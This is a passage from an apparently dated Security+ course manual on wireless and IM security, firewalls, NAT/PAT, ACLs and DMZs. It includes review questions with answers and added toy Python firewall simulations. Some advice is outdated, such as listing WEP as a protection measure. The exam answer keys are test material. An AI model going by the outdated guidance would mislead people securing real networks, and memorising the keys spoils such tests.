                          • If a hacker can gain access to an unguarded terminal, he or she can pose a quick
                              question that requires an immediate response on the part of the person being
                              questioned.
                          • Each client must have antivirus software installed to scan IM messages for viruses.
                          • A machine running IM software can be taken over with remote control software without
                              anyone knowing it. In addition, if the remote control software is used to connect to a local
                              site, all the actions of the controlling client can be seen by the wrong party.
                          • Impossible for corporations to monitor the content of messages.

5 What are some of the legal issues surrounding Instant Messaging software in the
  workplace?

  IM carries with it a possible threat of litigation or even criminal indictment should the wrong
  message be sent to or received by the wrong person (similar to e-mail). Corporations spend
  millions each year to safeguard themselves from legal issues surrounding the proper use of
  e-mail. Many times businesses have even gone so far as to monitor the content of messages
  to ensure that their employees say nothing inappropriate.


Unit summary: Wireless and instant messaging
Topic A              In this topic, you learned about security issues related to wireless data transfer and
                     802.11x standards. You learned that IEEE established the 802.11 working groups to
                     create standards of operability related to the interface between wireless clients and their
                     network access points in a local area network environment.
Topic B              In this topic, you learned about Wireless Application Protocol (WAP) and how it
                     works. You learned that WAP is an open, global specification that was created by the
                     WAP Forum to deliver information and services to users of handheld digital devices.
Topic C              In this topic, you learned about Wired Equivalent Privacy (WEP). You learned that
                     WEP is the encryption mechanism specified in the original IEEE 802.11 standard and
                     used by 802.11b to provide authentication and confidentiality in a wireless LAN
                     (WLAN) environment.
Topic D              In this topic, you learned about instant messaging. You learned that instant messaging
                     (IM) is a process and application that allows users to send and receive messages in real
                     time. IM can be used on both wired and wireless devices. You also learned that there are
                     serious security concerns regarding the usage of consumer IM systems because these
                     systems can transport sensitive and confidential data over the public networks in an
                     unencrypted form.

                     Review questions
                       1 One way to secure a wireless network is to use a:
                         A Firewall
                         B Scrambler
                         C   VPN
                         D DMZ
                       2 A recommended practice for wireless LANS is to: (Choose all that apply.)
                         A Disable file and print sharing
                         B Disable NetBEUI
                         C   Enable WEP protection

                         D   Use a strong encryption key

                         E All of the above
                       3 Which of the following can interfere with wireless transmission? (Choose all that
                         apply.)
                         A   Brick walls

                         B Cell phones
                         C   Cordless phones

                         D   Distance

4 The 802.11a standard can use which of the following bands?
  A 2.4GHz
  B   5GHz
  C 2.4MHz
  D 5MHz
5 The 802.11b standard can use which of the following bands?
  A   2.4GHz
  B 5GHz
  C 2.4MHz
  D 5MHz
6 The 802.11a standard can transmit data at speeds of up to _____Mbps.
  A 11
  B 36
  C 48
  D   54
7 Which of the following protocols is used to encrypt wireless transmission?
  A WAP
  B   WEP
  C WSP
  D WDP
8 The IEEE working group F has been tasked with creating a standard to allow for
  better roaming between access points and distribution systems. True or false?
  True

9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
  A   WAE

  B   WTP

  C WSSL
  D   WDP
  E WIP

                  10 WAP 2.0 has added a number of features that include which of the following?
                     (Choose all that apply.)
                      A WAP Push
                      B User agent profile
                      C Wireless Telephony Application
                      D External Functionality Interface (EFI)
                      E Multimedia Messaging Service (MMS)
                      F   All of the above
                  11 Instant messaging networks operate in either ______________ or ___________
                     configurations. (Choose all that apply.)
                      A   peer-to-network
                      B network-to-network
                      C client/server
                      D   peer-to-peer
                  12 AOL Instant Messenger uses which TCP port?
                      A   5190
                      B 5050
                      C 80
                      D 1023


Unit 9
Network devices
                  Unit time: 120 minutes

                  Complete this unit, and you’ll know how to:

                  A Describe the purpose of a network firewall
                     and how firewalls are implemented.

                  B Explain how routers can be configured to
                     provide additional security to a network.

                  C Identify the vulnerabilities of switches.

                  D Describe the proper measures for securing
                     telecom, cable modem, and wireless
                     communications devices.

                  E Provide a secure remote connection
                     through RAS and VPN technologies.

                  F Identify the different types of intrusion
                     detection systems.

                  G Perform network monitoring.


Topic A: Understanding firewalls
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          3.1    Understand security concerns and concepts of the following types of devices
                                  • Firewalls




                         Firewall concepts
Explanation              There are really only two principal ways to secure a computer or network of computers
                         from external breach: either physically isolate the computer or network from the outside
                         world by disconnecting the network and telecom cables that provide contact with any
                         other computers or networks; or virtually isolate the computer or network by
                         implementing a firewall to stand guard between the outside world and the computer or
                         network.
                         A firewall is a barrier that isolates one network from another. Its main function is to
                         protect an internal, private network from unauthorized access by an external, public
                         network. The firewall can be a dedicated physical device or a software feature added to
                         a router, switch, or other similar device. There are many ways to build a network
                         firewall, but the following five steps will ensure that you have not missed anything:
                             1 Draft a written security policy. A well-written security policy ensures that the
                                 necessary blend of security and services is provided to the organization.
                             2 Design the firewall to implement the security policy.
                             3 Implement the firewall design by installing the selected hardware and software.
                             4 Test the firewall. It’s fine to say you have a firewall, but if it doesn’t work as
                                 intended, it might give you a false sense of security, increasing potential risk.
                             5 Review new threats, requirements for additional security, and updates to adopted
                                 systems and software. If additions or modifications are necessary, repeat the
                                 process from step one, in light of these changes.
                         This is the management cycle for firewall protection, but the requirements of each,
                         especially the first item, are often minimized or skipped, because most corporate
                         managers find network security to be an arcane subject.

                         Drafting a security policy
                         Before implementing any security system, you should ask the following questions: What
                         am I protecting? Whom am I protecting it from? What services does my company need
                         to access over the network? Who gets access to which resources? Finally, who
                         administers the network? By carefully considering these questions, you can draft a
                         robust security policy.

                         Available targets and who is aiming at them
                         In answering the first and second questions, you need to determine what resources
                         within your company need to be protected. Common areas of attack are Web servers,
                         mail servers, FTP services, and databases. It’s recommended that you complete a full
                         audit of the resources in your organization so you have a better understanding of what
                         targets are available.
                                                                    Network devices   9–3

Scan for services that were not explicitly authorized by the company. Some employees
might set up ad hoc FTP servers or Web servers, so it is critical to scan for open ports at
all addresses. In addition, consider who might want to circumvent your security
measures, and identify their motives. The types of hackers range from sport hackers,
who are satisfied with merely penetrating your defenses, to hackers whose intent is to
cause damage or theft.

Which services should be made available?
In answering the third question, you should catalogue which services need to be
available to your company’s employees. Available services might provide access to
intruders, so it’s imperative you lock out those services that are not needed. The
following table lists common port mappings:

 Service                               TCP port #                   UDP port #
 Dial Pad                              51210                        51200, 51201
 DNS                                   53                           53
 FTP                                   20, 21
 ICQ                                   4000
 IPSEC                                 500
 IRC (Estimation)                      6661-6667                    1080-6660
 HTTP                                  80
 HTTPS                                 443                          443
 NetMeeting                            389, 522, 1503, 1720, 1731
 NNTP                                  119
 Novell VPN software (BorderManager)   353, 2010, 213
 pcAnywhere 2.0, 7.0, 7.50, 7.51       65301                        22
 POP3                                  110
 PPTP                                  1723
 SMTP                                  25
 SSH                                   22, 1019-1023                22, 1019-1023
 SNMP                                  161
 Telnet                                23
 TFTP                                                               69
 AOL Instant Messenger                 5190, 4443


By blocking those ports that correspond to services you do not need, your system will
be more secure.

                    Who gets access to which resources?
                    In addition to determining which services are required, you must determine who should
                    have access to which resources within your network. You should list the employees or
                    groups of employees along with the files, file servers, databases, and database servers to
                    which they need access. In addition, you should list which employees need remote
                    access to the network.

                    Who administers the network?
                    This question is easily answered: you will be administering the network. On larger
                    networks, however, there might be more than one person responsible for administering
                    the network. These people, and the scope of each one’s management control, need to be
                    determined up front.

Do it!              A-1:      Drafting a security policy
                      Questions and answers
                       1 What is a firewall?

                          A firewall is a barrier that isolates one network from another. Its main function is to protect
                          an internal, private network from unauthorized access by an external, public network.

                       2 What are the recommended steps to build a network firewall? (Choose all that
                         apply.)
                          A      Draft a written security policy.
                          B      Design the firewall to implement the security policy.
                          C      Implement the firewall design by installing the selected hardware and/or software.
                          D      Test the firewall.
                          E      Review new threats.
                          F      All of the above.

                       3 One of the steps to drafting a security policy is to catalogue which services need
                         to be available to your company’s employees and lock out all services that are not
                         needed. True or false?

                          True

              Designing the firewall to implement the policy
Explanation   Once you have your written security policy, you can begin the process of selecting the
              appropriate technology to deploy as your firewall. Reading through the remainder of
              this unit will familiarize you with available technologies and give you an understanding
              of what should be used under which circumstances.

              What do firewalls protect against?
              Firewalls effectively protect against malicious packets from the outside and
              unauthorized Internet access from within the company. There are several common
              network attacks that can be successfully blocked by a properly configured and
              functioning firewall: denial of service (DoS), ping of death, Teardrop or Raindrop
              attacks, SYN flood, LAND attack, brute force or smurf attacks, IP spoofing, and others.
              Firewalls offer no protection against malicious attacks from internal users.

              How do firewalls work?
              At their core, all firewalls protect networks using some combination of the following
              techniques:
                  • Network address translation (NAT)
                  • Basic packet filtering
                  • Stateful packet inspection (SPI)
                  • Access control lists (ACL)
              Basic firewalls use only one technique, usually NAT, but firewalls that are more
              comprehensive use all of the techniques combined. However, as added features usually
              increase complexity and cost, it’s a good idea to closely examine your needs as written
              down in your security policy and implement only those solutions that are appropriate.

              Network address translation
              One of the most common security features offered by most firewalls is network address
              translation (NAT). NAT gives you the ability to mask the IP addresses of those
              computers behind the firewall from the external world.
              Even though private addresses are used internally, all internal routers have a default
              route that directs public addresses to a specific NAT router. Each time a connection is
              made from an internal private address, the NAT router selects an available public
              address from a pool of available IPs and inserts it into the packet prior to forwarding it
              on to the external network. A table that maps internal to external addresses is
              maintained to ensure proper mapping for the duration of the connection. Neither the
              host nor the client involved in the connection is aware of the intervening NAT, so no
              special accommodations need to be made in client or server applications.
              The problem with basic NAT is that each active connection requires a unique external
              address for the duration of the communication. With the increased use of the Web, a
              much higher percentage of internal systems are likely to be connected to the public
              network at a given time. Under basic NAT, this requires a much larger pool of public
              addresses. A derivative of NAT, port address translation (PAT), tackles this issue by
              supporting thousands of simultaneous connections on a single public IP address.

                 Port address translation
                 PAT guarantees a unique connection by using a combination of an IP address and a
                 TCP or UDP port, called a socket, rather than the address alone. When an internal
                 system connects to an external resource, it typically selects a short-lived source port to
                 create a unique socket. When the request routes through the NAT, the IP address is
                 changed to a public address and a short-lived port is selected that guarantees
                 uniqueness. A table of the source address, source port, NAT source IP, NAT source
                 port, destination IP, and destination port is maintained by the router. The combination of
                 NAT source IP and NAT source port and destination IP and port are guaranteed to be
                 unique.
                 PAT is really a subset of NAT and is now available in very inexpensive routers
                 available for home use. This provides a useful method for conserving IP addresses, as
                 well as concealing internal system identities. A drawback of this method is with the
                 server—each external IP address can only support a single process on any given port,
                 although the NAT router can direct these connections to different internal systems. NAT
                 with port address translation is shown in the following table:

                   Inside Source Address: Port   Outside Source Address: Port   Outside Destination Address
                   10.1.1.2:1100                 192.50.20.1:1024               192.50.20.2
                   10.1.1.3:1200                 192.50.20.1:1025               192.50.20.3
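The translation table above, worked through in code as an added example that is not part of the course text: a toy PAT router (class and method names are mine) that owns one public address, allocates a short-lived NAT source port for each inside socket and destination, and reverses the mapping for replies. The addresses and ports are the constructed sample values from the table; an inbound packet with no table entry is dropped, which is the concealment benefit the text describes.

```python
"""Toy port address translation (PAT) table.

Added example, not from the course text. One public address (192.50.20.1)
fronts the private 10.1.1.0 network; the sample addresses and ports are
the constructed values from the table above.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Socket = Tuple[str, int]  # (IP address, TCP/UDP port)


@dataclass(frozen=True)
class Packet:
    src: Socket
    dst: Socket


class PatRouter:
    """Rewrites outbound source sockets to the router's public address plus a
    short-lived port, and reverses that rewrite for replies.

    Each inside (source socket, destination socket) pair gets its own NAT
    source port, so many inside hosts share one public IP. Inbound packets
    that match no table entry are dropped: nothing inside asked for them.
    """

    def __init__(self, public_ip: str, first_port: int = 1024, last_port: int = 65535):
        self.public_ip = public_ip
        self.next_port = first_port
        self.last_port = last_port
        # (inside src socket, outside dst socket) -> NAT source port
        self.outbound: Dict[Tuple[Socket, Socket], int] = {}
        # (NAT source port, outside dst socket) -> inside src socket
        self.inbound: Dict[Tuple[int, Socket], Socket] = {}

    def translate_outbound(self, pkt: Packet) -> Packet:
        """Inside -> outside: allocate (or reuse) a NAT source port."""
        key = (pkt.src, pkt.dst)
        nat_port = self.outbound.get(key)
        if nat_port is None:
            if self.next_port > self.last_port:
                raise RuntimeError("PAT port pool exhausted")
            nat_port = self.next_port
            self.next_port += 1
            self.outbound[key] = nat_port
            self.inbound[(nat_port, pkt.dst)] = pkt.src
        return Packet(src=(self.public_ip, nat_port), dst=pkt.dst)

    def translate_inbound(self, pkt: Packet) -> Optional[Packet]:
        """Outside -> inside: restore the inside socket, or drop (None)."""
        if pkt.dst[0] != self.public_ip:
            return None
        inside = self.inbound.get((pkt.dst[1], pkt.src))
        if inside is None:
            return None  # unsolicited packet: no inside host opened this flow
        return Packet(src=pkt.src, dst=inside)

    def table(self) -> List[Tuple[str, str, str]]:
        """Rows in the shape of the course table: inside socket, outside
        source socket, outside destination address."""
        return [
            (f"{src[0]}:{src[1]}", f"{self.public_ip}:{port}", dst[0])
            for (src, dst), port in self.outbound.items()
        ]


if __name__ == "__main__":
    router = PatRouter("192.50.20.1")
    router.translate_outbound(Packet(("10.1.1.2", 1100), ("192.50.20.2", 80)))
    router.translate_outbound(Packet(("10.1.1.3", 1200), ("192.50.20.3", 80)))
    for row in router.table():
        print(*row)
    # The reply to the first flow is mapped back; a stray inbound packet is dropped.
    print(router.translate_inbound(Packet(("192.50.20.2", 80), ("192.50.20.1", 1024))))
    print(router.translate_inbound(Packet(("203.0.113.9", 4444), ("192.50.20.1", 1024))))
```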



                 Basic packet filtering
                 After NAT, the most basic security function performed by a firewall is packet filtering.
                 Packet filters decide whether to forward individual TCP/IP packets based on
                 information contained in the packet header and on filtering rules set by the network
                 administrator. Most packet filters can be configured to screen information based on the
                 following data fields: protocol type, IP address, TCP/UDP port, and source routing
                 information.
                 Improper filtering can end up blocking valid packets or permitting rogue packets. For a
                 more thorough discussion of network packet handling, see the section on routers later in
                 this unit.

                 Stateful firewalls
                 Stateful firewalls represent a major advancement in firewall technology. They keep a
                 record of every network connection in which they participate. They can record session-
                 specific information, including which ports are in use on the client and server. This is
                 important because, although most Internet services run on well-known ports, Internet
                 clients might be using any port above 1023.
                 A basic (stateless) packet filter must let Web servers respond to browsers at one of these
                 high port numbers, but it can’t tell which one, so it leaves them all open.
                 Stateful packet inspection enhances security by allowing the filter to distinguish on
                 which side of the firewall a connection was initiated. This latter feature is essential to
                 blocking IP spoofing attacks.
                 A stateful packet filter monitors the three-way handshake that initiates a TCP
                 connection. Only TCP packets that are identified as being a part of the handshake, or
                 can be identified with an established connection, are allowed through the firewall.

Some filters even respond to connection requests on behalf of the internal server until
the three-way handshake is properly completed by mimicking the connection to the
internal server, and then they begin passing packets once the connection is made. Once
a session is properly ended or times out, no additional packets are allowed on that
connection without a new three-way handshake. This is an effective countermeasure
against SYN floods.
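The handshake tracking described above, as an added example that is not part of the course text: a toy stateful filter in Python (names and the inside-network prefix are my own assumptions) that admits a connection to its state table only on an outbound SYN, passes each later packet only if it fits the next expected step, and removes the entry on FIN or RST so that nothing more passes without a new handshake. The packet trace at the bottom is constructed.

```python
"""Toy stateful packet filter that follows the TCP three-way handshake.

Added example, not from the course text. Only a connection opened from the
inside (an outbound SYN) is admitted to the state table; afterwards each
packet is passed only if it fits the next expected step of that connection.
The inside prefix, addresses and packet sequence are constructed.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple

# Flow key, always written from the inside host's point of view.
Flow = Tuple[str, int, str, int]  # inside ip, inside port, outside ip, outside port


@dataclass(frozen=True)
class TcpPacket:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    flags: FrozenSet[str]  # subset of {"SYN", "ACK", "FIN", "RST"}


def flags(*names: str) -> FrozenSet[str]:
    return frozenset(names)


class StatefulFilter:
    def __init__(self, inside_prefix: str):
        self.inside_prefix = inside_prefix    # e.g. "10.1.1." (assumed)
        self.table: Dict[Flow, str] = {}      # flow -> connection state

    def _classify(self, pkt: TcpPacket) -> Tuple[Flow, str]:
        """Return the flow key and the packet direction ("out" or "in")."""
        if pkt.src_ip.startswith(self.inside_prefix):
            return (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port), "out"
        return (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port), "in"

    def inspect(self, pkt: TcpPacket) -> bool:
        """True if the packet is forwarded, False if it is dropped."""
        flow, direction = self._classify(pkt)
        state = self.table.get(flow)
        f = pkt.flags

        if state is None:
            # Unknown connection: only an outbound SYN may open one. An inbound
            # SYN (unsolicited connection attempt, or one packet of a SYN
            # flood) and any stray ACK for a connection never seen are dropped.
            if direction == "out" and f == {"SYN"}:
                self.table[flow] = "SYN_SENT"
                return True
            return False

        if state == "SYN_SENT":
            # Step 2 of the handshake must come from the outside peer.
            if direction == "in" and f == {"SYN", "ACK"}:
                self.table[flow] = "SYN_RECEIVED"
                return True
            return False

        if state == "SYN_RECEIVED":
            # Step 3: the inside host's ACK completes the handshake.
            if direction == "out" and "ACK" in f and "SYN" not in f:
                self.table[flow] = "ESTABLISHED"
                return True
            return False

        # ESTABLISHED: data may flow both ways, but a SYN inside an open
        # connection is out of place. FIN or RST removes the entry at once
        # (a real filter waits for both sides' FINs); afterwards a new
        # handshake is required before anything else passes.
        if "FIN" in f or "RST" in f:
            del self.table[flow]
            return True
        return "SYN" not in f


def run_trace(fw: StatefulFilter, packets: List[TcpPacket]) -> List[bool]:
    """Feed packets through the filter in order and collect the verdicts."""
    return [fw.inspect(p) for p in packets]


INSIDE, OUTSIDE = "10.1.1.2", "192.50.20.2"   # constructed sample hosts
SAMPLE_TRACE = [
    TcpPacket(OUTSIDE, 4444, INSIDE, 80, flags("SYN")),          # inbound SYN: dropped
    TcpPacket(INSIDE, 1100, OUTSIDE, 80, flags("SYN")),          # step 1
    TcpPacket(OUTSIDE, 80, INSIDE, 1100, flags("SYN", "ACK")),   # step 2
    TcpPacket(INSIDE, 1100, OUTSIDE, 80, flags("ACK")),          # step 3
    TcpPacket(OUTSIDE, 80, INSIDE, 1100, flags("ACK")),          # reply data
    TcpPacket(OUTSIDE, 80, INSIDE, 1101, flags("ACK")),          # stray ACK: dropped
    TcpPacket(INSIDE, 1100, OUTSIDE, 80, flags("FIN", "ACK")),   # teardown
    TcpPacket(OUTSIDE, 80, INSIDE, 1100, flags("ACK")),          # after close: dropped
]

if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_TRACE, run_trace(StatefulFilter("10.1.1."), SAMPLE_TRACE)):
        print(sorted(pkt.flags), f"{pkt.src_ip}:{pkt.src_port} -> {pkt.dst_ip}:{pkt.dst_port}",
              "pass" if verdict else "drop")
```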

Access control lists
Traffic filtering is available through access control lists (ACL). A Cisco router provides
two levels of filtering: the standard list and the extended list (the latter allows filtering
by additional criteria).
The basic syntax is as follows:
    access-list list_number permit|deny source_IP_address network_mask
For example, to stop any inbound packet with an internal (spoofed) source IP address:
    access-list 101 deny 10.13.31.0 0.0.0.255
At the same time, to let all outbound internal packets with a legitimate source IP address
through, include:
    access-list 102 permit 10.13.31.0 0.0.0.255
Access lists are executed from first statement to last until a match on the inspected
packet is found, then all processing of the list stops, and the rule of the first match is
applied. There is an implied “deny everything else” at the end of every list so if no
matches occur, the packet is denied by default.
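The two list rules just stated (first match wins, implied deny at the end), as an added example that is not part of the course text: a toy evaluator in Python for access lists in the syntax shown above. The lists are constructed; a permit-any line is added to list 101 because, with the implicit deny, the single deny entry shown in the text would otherwise block every inbound packet. The `any` keyword and the single-host form without a mask are standard Cisco syntax not shown in the text, and the wildcard-mask convention (a 0 bit must match, a 1 bit is ignored) is assumed for the mask column.

```python
"""Toy evaluator for Cisco-style standard access lists.

Added example, not from the course text. Entries are tried in order and
the first match wins; an unmatched packet hits the implied "deny
everything else". Wildcard masks follow the Cisco convention: a 0 bit
must match, a 1 bit is "don't care". The lists below are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class AclEntry:
    action: str     # "permit" or "deny"
    network: str    # e.g. "10.13.31.0"
    wildcard: str   # e.g. "0.0.0.255"

    def matches(self, ip: str) -> bool:
        addr = int(ipaddress.IPv4Address(ip))
        net = int(ipaddress.IPv4Address(self.network))
        wild = int(ipaddress.IPv4Address(self.wildcard))
        care = ~wild & 0xFFFFFFFF   # bits the entry actually checks
        return (addr & care) == (net & care)


def parse_access_list(lines: List[str]) -> Dict[int, List[AclEntry]]:
    """Parse 'access-list <n> permit|deny <addr> [<wildcard>]' or '... any'."""
    lists: Dict[int, List[AclEntry]] = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[0] != "access-list":
            raise ValueError(f"unrecognised entry: {line!r}")
        number, action = int(parts[1]), parts[2]
        if action not in ("permit", "deny"):
            raise ValueError(f"bad action in {line!r}")
        if parts[3] == "any":
            network, wildcard = "0.0.0.0", "255.255.255.255"
        else:
            network = parts[3]
            wildcard = parts[4] if len(parts) > 4 else "0.0.0.0"  # single host
        lists.setdefault(number, []).append(AclEntry(action, network, wildcard))
    return lists


def evaluate(entries: List[AclEntry], src_ip: str) -> str:
    """First matching entry decides; no match means the implied deny."""
    for entry in entries:
        if entry.matches(src_ip):
            return entry.action
    return "deny"


# Constructed lists in the syntax of the text: 101 is meant for the inbound
# side of the external interface, 102 for the outbound side.
SAMPLE_CONFIG = [
    "access-list 101 deny 10.13.31.0 0.0.0.255",    # spoofed internal source
    "access-list 101 permit any",                    # everything else may enter
    "access-list 102 permit 10.13.31.0 0.0.0.255",  # legitimate internal source
]


if __name__ == "__main__":
    acls = parse_access_list(SAMPLE_CONFIG)
    for number, ip in ((101, "10.13.31.77"), (101, "203.0.113.5"),
                       (102, "10.13.31.77"), (102, "203.0.113.5")):
        print(f"list {number}: source {ip} -> {evaluate(acls[number], ip)}")
```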

Do it!              A-2:      Designing the firewall to implement policy
                      Questions and answers
                       1 Network address translation (NAT) involves the translating of the MAC address
                         of a network interface card before a packet is sent out onto the Internet. True or
                         false?

                          False. NAT masks the IP addresses of computers behind the firewall from the external world.

                       2 The problem with basic NAT is that each active connection requires a unique
                         external address for the duration of the communication. True or false?

                          True

                       3 Stateless packet filters can record session-specific information about the network
                         connection. True or false?

                          False: Stateful packet filters do this.

                       4 Which of the following data items is found in the port address translation table?
                         (Choose all that apply.)
                          A      Source address
                          B      NAT source port
                          C      NAT source IP address
                          D      Destination port
                          E      All of the above

                       5 Most packet filters can be configured to screen information based on the protocol
                         type, IP address, TCP/UDP port, and source routing information fields. True or
                         false?

                          True

                       6 Access control lists work by blocking all inbound packets. True or false?

                          False: They can either allow or block inbound or outbound packets for specific IP addresses.


Topic B: Routers
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • Routers




              Introducing routers
Explanation   A router is a network management device that sits between different network segments
              and routes traffic from one network to another. This role of digital go-between is
              essential because it allows different networks to communicate with one another and
              allows the Internet to function. With the addition of packet filtering however, routers
              can take on an additional role of digital traffic cop.

              How a router moves information
              When you use your computer to access the Internet, you are employing the services of
              multiple routers. You type an address into your Web browser, the request is sent out into
              cyberspace, and the requested Web page loads on your browser. The steps involved are
              as follows:
                  1 Internet data, whether in the form of a Web page, a downloaded file, or an e-
                      mail message, travels over a packet-switching network. The information is
                      broken up into pieces and inserted as data into packets.
                  2 To complete the packet, additional information is included: the sender’s address,
                      the receiver’s address, and a checksum value that allows the receiving computer
                      to be sure that the packet arrived intact.
                  3 Each packet is then sent to its destination using the best available route, which
                      might differ for each packet.
              If the path the packet takes is not preset, then how is it chosen? That is where the router
              comes in. The routers that make up the main part of the Internet can reconfigure the
              paths that packets take because they are constantly in communication with one another
              and are aware of each of the networks to which they are connected. By examining the
              contents of the packet and comparing the destination address to the list of addresses
              contained in the router’s lookup tables, they can determine which router to send the
              packet along to next, based on changing network conditions.

              Beyond the firewall
              Beyond the firewall, but before the Internet, lies a no-man’s land called the
              demilitarized zone (DMZ) and, potentially, one or more bastion hosts.

                  Demilitarized zone (DMZ)
                   The demilitarized zone (DMZ) is the area that a company sets aside for servers that are
                   publicly accessible or have lower security requirements than other internal servers. The
                   DMZ gets its name from the traditional setup of a network segment between two
                   routers. This environment is neither subject to the unsecured environment of the Internet
                   nor fully protected by the internal router—hence it is “demilitarized.”
                  The DMZ is commonly home to public Web, FTP, and DNS servers that need to be
                  accessed by the public. This is also a typical location to place remote dial-up access,
                  providing defense in depth with the interior router. If a hacker gains access to the
                  RADIUS server, he or she still must authenticate through the internal firewall. This can
                  be seen in Exhibit 9-1.

                   Exhibit 9-1: An example of a demilitarized zone (DMZ)


                  Bastion hosts
                  A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail,
                  DNS, and/or FTP services. An effective bastion host is configured quite differently from
                  a typical host. Some organizations have a bastion host that offers several services at
                  once; other organizations prefer to have several bastion hosts with each fulfilling a
                  specific role. In either event, all unnecessary programs, services, and protocols are
                  removed and all unnecessary network ports are disabled.
                  In addition, bastion hosts do not share authentication services with trusted hosts within
                  the network. This is so that, if a bastion host is compromised, the hacker cannot gain
                  any information beyond what resides on the bastion host. ACLs are modified on the file
                  system and other system objects.
                  All appropriate service packs, hot fixes, and patches should be installed on bastion
                  hosts. Logging of all security-related events should also be enabled, and those logs
                  should be reviewed on a regular basis to increase the chance of observing any
                  inappropriate behavior.

“Honey pots” or decoy computers specifically set up to attract and track potential
hackers are not considered true bastion hosts, because they are not designed to offer
legitimate services to the Internet, but rather are deliberately exposed to delay and
sidetrack potential hackers and to facilitate tracking of any attempted break-ins.

Application gateways
Application gateways, also known as proxy servers, monitor specific applications such
as FTP, HTTP, and Telnet, plus they allow packets accessing those services to go to
only those computers that are allowed. Application gateways are a good backup to
packet filters because a firewall that is set up to allow a specific service such as FTP can
send the allowed packets to only one computer, the application gateway.
As an example of how an application gateway works, consider a site that blocks all
incoming FTP connections except those to a specific computer. The router allows FTP
packets to go to only one computer, the FTP application gateway. A user who wishes to
connect inbound to an FTP server would have to connect first to the application
gateway, and then to the destination computer, as follows:
    1 A user first connects to the application gateway and enters the name of an
       internal computer.
    2 The gateway checks the user’s source IP address and accepts or rejects it
       according to the access control list.
    3 The user might need to authenticate himself or herself with a username and
       password.
    4 The proxy service creates an FTP connection between the gateway and the
       internal computer.
    5 The gateway proxy service then passes bytes between the two connections.
    6 The application gateway logs the connection.
  The security advantages inherent in application gateways also include:
    • Information hiding — The application gateway might be the only computer with
      a name known to the outside world; the actual servers hosting services such as
      FTP need never be disclosed.
    • Robust authentication and logging — All traffic can be made to pass through
      the application gateway; traffic can be authenticated before it reaches internal
      computers and can be logged.
    • Simpler filtering rules — The application gateway is the only computer that
      needs to be contacted by the filtering firewall or router; those systems need only
      allow application traffic destined for the gateway and discard the rest.
The chief disadvantage of application gateways is that a single computer host assigned
as the gateway must handle all incoming connections that, in a busy environment, could
overwhelm the gateway. In addition, in the case of client-server protocols such as
HTTP, two steps are required to connect inbound or outbound traffic, and this can
increase processor overhead if there are many connections.

                  The OSI stack
                  To better describe the various functions in most networks and to further the
                  development of compatible products by vendors, the Open Systems Interconnection
                  (OSI) reference model was developed by the International Organization for
                  Standardization. The seven layer model can be seen in Exhibit 9-2.

                   Exhibit 9-2: The OSI seven layer model

                      • The Physical layer (layer 1) deals with the electrical signals, the media access
                        method (Ethernet, Token-Ring, etc.), and the actual hardware of networking,
                        including cables, connectors, hubs and network cards.
                      • The Data Link layer (layer 2) deals with the MAC address. This is the layer
                        where bridges and older switches function.
                      • The IP protocol works at the Network layer (layer 3), providing addressing and
                        routing functions.
                      • The Transport layer (layer 4) is responsible for host-to-host communications. Its
                        two protocols are TCP and UDP.
                      • The Session layer (layer 5) establishes, manages, and terminates connections.
                      • The Presentation layer (layer 6) translates the application’s data format to the
                        network’s communication format.
                      • The Application layer (layer 7) defines how programs like FTP, HTTP, and
                        Telnet exchange data.

A function at each layer need only be able to communicate with the layers above and
below it and be able to communicate with its peer level. Changes at one level should not
affect the ability of the other layers to function. For instance, if a Token Ring network is
migrated to an Ethernet system, only the cabling, hardware, and drivers that represent
the Physical and Data-Link layers need be modified, but the IP network should still
function, as well as all protocols and applications above it.

Limitations of packet-filtering routers
Defining packet filters can be a cumbersome task because network administrators must
have a detailed understanding of the various Internet services, packet header formats,
and the specific values they expect to find in each field. If complex filtering
requirements must be supported, the ACL can become long, complicated, and
increasingly difficult to manage and comprehend. In addition, as the list of filtering
rules grows, the processor overhead and, consequently, the time it takes to handle a
packet also grow.
Generally, as the number of rules being processed by a router increases, the throughput
of the router decreases. Most routers are optimized to extract the destination IP address
from each packet, look up the forwarding information for the packet, and then send the
packet on its way. With packet filtering enabled, the router must now apply each of the
rules in the ACL and make a decision about forwarding the packet. This process
increases the amount of time it takes to send a packet along and decreases the
throughput speed of the router.
Another problem with filtering packets at layers 3 through 5 is that the router is not able
to determine the specific context or data of the packets it is examining. This means that
the router can reject all e-mail packets but cannot reject just those e-mail packets that
contain potentially harmful material such as viruses. In order to block a specific type of
e-mail message, FTP request, or Telnet command, an application gateway or proxy
server needs to be employed.
Routers that employ stateful packet filters act as quasi application gateways, examining
a packet’s content in addition to the IP address.

Do it!              B-1: Discussing routers and gateways
                      Questions and answers
                       1 When a packet goes through a router with ________________ packet inspection,
                         the router inspects both the IP header and the content of the packet.

                          stateful

                       2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP
                         services is called a ________ ________.

                          bastion host

                       3 IP packets are routed by layer 2 of the OSI model. True or false?

                          False: They are routed by layer 3.

                       4 Application gateways are also known as proxy servers. True or false?

                          True

                       5 Some of the features of a DMZ are:
                          A      It is a network segment between two routers.
                          B      Its servers are publicly accessible.
                          C      Its servers have lower security requirements than other internal servers.
                          D      It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers.
                          E      All of the above.

                       6 Application gateways simplify filtering rules on routers; the router need only
                         allow application traffic destined for the gateway, and can discard the rest. True or
                         false?

                          True

                       7 Which of the following tasks can be performed by the proxy server? (Choose all
                         that apply.)
                          A      Checks its access control list to accept or reject the client request
                          B      Authenticates the user
                          C      Opens a connection between the user and the internal computer
                          D      Logs the connection
                          E      All of the above
                                                               Network devices     9–15

8 Describe two limitations of packet-filtering routers in managing security.
  Answers might include:
  • Packet filters can be cumbersome to define
  • Processor overhead grows and throughput decreases with complexity of the ACL
